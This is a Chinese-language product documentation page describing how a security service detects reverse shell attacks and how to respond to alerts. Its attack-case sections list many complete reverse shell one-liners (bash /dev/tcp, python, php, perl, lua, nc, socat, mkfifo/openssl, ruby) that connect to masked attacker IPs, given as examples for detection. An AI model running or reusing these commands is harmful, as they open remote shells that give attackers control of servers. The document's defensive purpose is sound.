Security Center：檢測和處理反彈Shell攻擊

核心思想

面對複雜多變的反彈 Shell 攻擊，Security Center摒棄了依賴單一特徵匹配的傳統方案，構建了新一代立體檢測體系，其核心思想是：

• 超越傳統特徵： 從攻擊行為本質出發，而非依賴不穩定的靜態特徵（如Regex）。

• 多維資料擷取： 通過主機 Agent 即時擷取進程、檔案、網路、核心調用等全量資料。

• 雲端智能分析： 結合雲端巨量資料平台，對海量資料進行關聯分析與行為建模，實現交叉驗證。

這一雲端結合的縱深檢測體系，能夠精準、高效地發現各類已知及未知攻擊，提升檢出率與準確性。

關鍵檢測技術

Security Center檢測體系由多種關鍵技術組成，從不同維度還原攻擊行為，實現交叉驗證。

• 檔案描述符 （FD）分析

  • 檢測原理與方法： 即時監控進程的檔案描述符，一旦發現 Shell 進程的標準輸入/輸出/錯誤被重新導向至網路 Socket，立即警示。

  • 主要檢測目標：通過 bash -i >& /dev/tcp/... 等命令直接發起的、基於I/O重新導向的反彈 Shell。

• 異常命令序列分析

  • 檢測原理與方法： 基於巨量資料平台建立伺服器的正常命令序列基準。當出現與已知攻擊模式（如偵察、提權）相似的異常序列時，判定為高風險。

  • 主要檢測目標：通過 Python、Perl 等指令碼語言實現的、無明顯 Shell 進程特徵的反彈 Shell，以及後續的橫向移動行為。

• 異常進程啟動鏈分析

  • 檢測原理與方法：綜合分析進程的父子關係、啟動參數、使用者上下文和歷史行為，識別由異常父進程（如 Web 服務）啟動的非互動式 Shell。

  • 主要檢測目標：隱藏在正常業務流量中、由 Web 漏洞引發的反彈 Shell。

• 惡意檔案深度分析

  • 檢測原理與方法：

    • 指令碼沙箱：對落地指令碼（Bash、Python、JAR）進行動態Trace和靜態反編譯，識別混淆代碼中的惡意邏輯。

    • 二進位沙箱：分析編譯型程式（C/C++、Go、Meterpreter）的匯入函數、代碼結構和動態行為（如網路連接）。

  • 主要檢測目標：經過高度混淆或加密的指令碼木馬；C/C++、Go 語言編寫的或 Meterpreter 產生的編譯型反彈 Shell 程式。

• 網路流量對抗特徵檢測

  • 檢測原理與方法：分析網路流量中的互動式 Shell 通訊特徵，並檢測替換系統 Shell、命令編碼等常見的對抗行為。

  • 主要檢測目標：作為補充手段，增強對已知攻擊模式和繞過技術的覆蓋面。

開啟反彈Shell檢測

如果已開通Security Center付費版，且目標伺服器已安裝用戶端Agent（線上狀態），則反彈Shell檢測功能預設開啟，無需手動操作。

分析與解讀警示

當Security Center檢測到可疑的反彈Shell活動時，將在威脅分析與響應 > 安全警示或檢測響應 > 安全警示頁面，定位至反彈Shell警示後，進入警示詳情頁。分析警示時，重點關注以下資訊：

• 威脅等級：通常為高危，表示需要立即關注和處理。

• 進程資訊：展示了觸發警示的進程路徑和命令列參數。這是判斷是否為惡意行為的關鍵依據。例如，一個由www-data使用者啟動的/bin/bash -i進程是典型的高危指標。

• 父進程資訊：提供了可疑進程的來源，有助於追溯攻擊路徑。例如，父進程是Web伺服器（如Apache、Nginx），則表明攻擊很可能源於Web漏洞。

• 對外串連資訊：如果存在，會顯示可疑進程串連的遠程IP地址和連接埠，該IP即為攻擊者控制端的地址。

處理警示

在警示詳情頁面，可以根據實際業務情況和風險評估結果，對識別到的反彈Shell安全威脅採取以下處置措施。更多資訊請參見分析及處理安全警示。

• 病毒查殺：立即終止病毒進程並將病毒檔案移至隔離區，隔離後的檔案無法執行、訪問或傳播，這是最徹底的一鍵處置方案。

• 分離：僅將可疑檔案移入隔離區，使其無法運行，此操作不會立即結束已在運行中的進程。

• 結束進程：立即終止警示關聯的惡意進程，快速切斷攻擊行為。

• 加白名单：如果經過排查，確認警示是由於正常的營運或業務指令碼觸發的誤判，可將其加入白名單。

  說明

  支援基於檔案路徑、MD5等設定白名單規則，避免同類事件再次產生警示。

安全強化

1. 阻斷網路連接

   • 在警示詳情中找到攻擊者的IP地址。

   • 配置安全性群組策略，在入方向和出方向上，拒絕來自該 IP 的所有訪問，徹底切斷攻擊者的串連。

2. 清除持久化後門

   攻擊者通常會設定持久化機制以維持控制，需要登入伺服器進行排查：

   • 檢查定時任務：執行crontab -l -u <user>（<user>為可疑進程的運行使用者，如root、 www-data），檢查是否存在可疑的定時任務。如果發現，使用crontab -e編輯並刪除惡意條目。

   • 刪除惡意檔案：根據警示中提供的檔案路徑，在伺服器上找到並刪除對應的惡意指令碼或二進位檔案。

3. 全面排查與加固

   • 在Security Center控制台，使用防護配置 > 主機防護 > 病毒查殺功能對伺服器進行一次全面的檔案掃描和後門檢測，確保沒有其他隱藏的惡意檔案。

   • 檢查並修複伺服器上存在的安全性漏洞，從根本上杜絕攻擊入口。

類型一：直接I/O重新導向

• 核心原理：該類型反彈Shell通過重新導向bash -i的標準輸入、標準輸出、標準錯誤到/dev/tcp Socket進行網路通訊。

• 檢測思路：檔案描述符 (FD) 分析，通過監控進程的 FD 表，檢測 Shell 進程的標準 I/O 是否被重新導向到網路 Socket。

• 攻擊案例：

  • 案例一：

    bash -i >& /dev/tcp/10.10.XX.XX/6060 0>&1

  • 案例二：

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.XX.XX",6060));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • 案例三：

    php -r '$sock=fsockopen("10.10.XX.XX",6060);exec("/bin/sh -i <&3 >&3 2>&3");'

  • 案例四：

    perl -e 'use Socket;$i="10.10.XX.XX";$p=6060;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  • 案例五：

    lua -e 
    "require('socket');require('os');t=socket.tcp();t:connect('10.10.XX.XX','6060');os.execute('/bin/sh -i <&3 >&3 2>&3');"

類型二：管道/偽終端中轉

• 核心原理：利用管道（Pipe）、偽終端（PTY）等作為“中轉站”，將 Shell 的 I/O 先重新導向到中間體，再由另一個進程將中間體與網路 Socket 串連。在某些變型的情境下，資料可能經過多層中轉，最終形成完整的遠端控制通道。

• 檢測思路：FD 鏈路追蹤與進程關係分析，追蹤資料流經的完整 FD 鏈路，識別出通過管道、PTY 串連到網路 Socket 的異常進程鏈。

• 攻擊案例：

  • 案例一：

    mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | openssl s_client -quiet -connect 0.0.XX.XX:666 > /tmp/f

  • 案例二：

    nc 10.10.XX.XX 5050 nc -e /bin/bash 10.10.XX.XX 6060 nc -c bash 10.10.XX.XX 6060 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.XX.XX:6060

  • 案例三：

    mknod backpipe p; nc 10.10.XX.XX 6060 0<backpipe | /bin/bash 1>backpipe 2>backpipe

  • 案例四：

    bash -c 'exec 5<>/dev/tcp/10.10.XX.XX/6060;cat <&5|while read line;do $line >&5 2>&1;done'

  • 案例五：

    telnet 10.10.10.10 6060 | /bin/bash | telnet 10.10.XX.XX 5050

  • 案例六：利用偽終端中轉的方式，此類檢測難度更高，需結合上下文綜合分析。

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.XX.XX",10006));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

類型三：指令碼語言內嵌執行

• 核心原理：不直接使用 Shell 的重新導向功能，而是在 Python、Ruby 等指令碼語言內部，通過代碼邏輯接收網路指令，調用 subprocess 或 exec 等函數執行，再將結果回傳。

• 檢測思路：行為序列分析與異常啟動模型，由於攻擊邏輯被程式碼封裝裹，需依賴更高維度檢測。通過分析異常的命令序列（如擷取 Shell 後的偵察行為）或識別由 Web 服務等異常父進程啟動的 Shell 來發現威脅。

• 攻擊案例：

  • 案例一：

    python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.10.XX.XX',6060))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), Shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

  • 案例二：

    lua5.1 -e 'local host, port = "10.10.XX.XX", 6060 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

  • 案例三：

    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.XX.XX","6060");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'